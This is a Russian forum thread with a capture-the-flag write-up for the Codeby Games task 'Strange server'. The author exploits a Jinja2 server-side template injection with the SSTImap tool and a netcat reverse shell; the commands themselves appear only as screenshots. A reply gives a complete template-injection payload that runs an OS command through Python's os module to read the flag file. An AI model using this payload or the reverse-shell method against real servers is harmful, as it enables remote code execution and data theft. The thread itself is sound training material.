Codeby Games Writeup - Странный сервер

morozko

Green Team
03.01.2024
13
17
BIT
239
Writeup который подтолкнул меня на самостоятельное решение этого task-а:
Codeby Games - Codeby Games - Странный сервер [Writeup]
От автора я узнал про SSTImap и с серьезным настроем начал сам добывать флаг.


Приступим к решению с помощью инструмента SSTImap

Давайте клонируем github репозиторий данного инструмента. Для начала скопируем ссылку:

1.jpg

Далее в терминале перейдем в директорию /opt и введем следующую команду:

sstimap.jpg

Дождемся клонирования и запустим инструмент со следующими опциями:

first_ssti.jpg

Где GET запрос ?test=test является полезной нагрузкой (payload - ом). Так мы узнаем использует ли сайт шаблонизатор. Как видим – да использует, это шаблонизатор Jinja2 написанный на python.

jinja2.jpg

Давайте просмотрим --help к SSTImap. Увидим, что есть опция –reverse-shell HOST PORT, в дальнейшем она нам пригодится для эксплуатации RCE уязвимости. Перейдем в браузер, в поисковой строке браузера пишем payload jinja2 и переходим по самой первой ссылке. Берем базовый payload {{7*7}} и возвращаемся в терминал, давайте вновь применим SSTImap!
Но перед этим нам необходимо запустить сервер с командой:

vds_nc.jpg

Наш сервер будет слушать 8000 порт и именно на нашем сервере мы проэксплуатируем RCE при помощи reverse shell. Мы примем подключение от атакуемого сервера.
Далее в терминале пропишем следующую команду:

reverse.jpg

Как вы можете видеть мы используем найденный нами payload {{7*7}}.
После того как инструмент отработает, вернемся к нашему серверу и увидим, что мы проэксплуатировали SSTI и RCE:

flag.jpg


Спасибо за внимание, успехов!
 

Cruel Lord

Green Team
29.08.2023
17
8
BIT
125
Решил проще, shell не понадобился {{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read() }}
 
  • Нравится
Реакции: ssh_402

serzh_fedorov

Green Team
19.08.2024
17
2
BIT
116
Для большего понимания как решил Cruel Lord, можно ознакомиться , как раз разбор самой техники
 
  • Нравится
Реакции: Cruel Lord
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!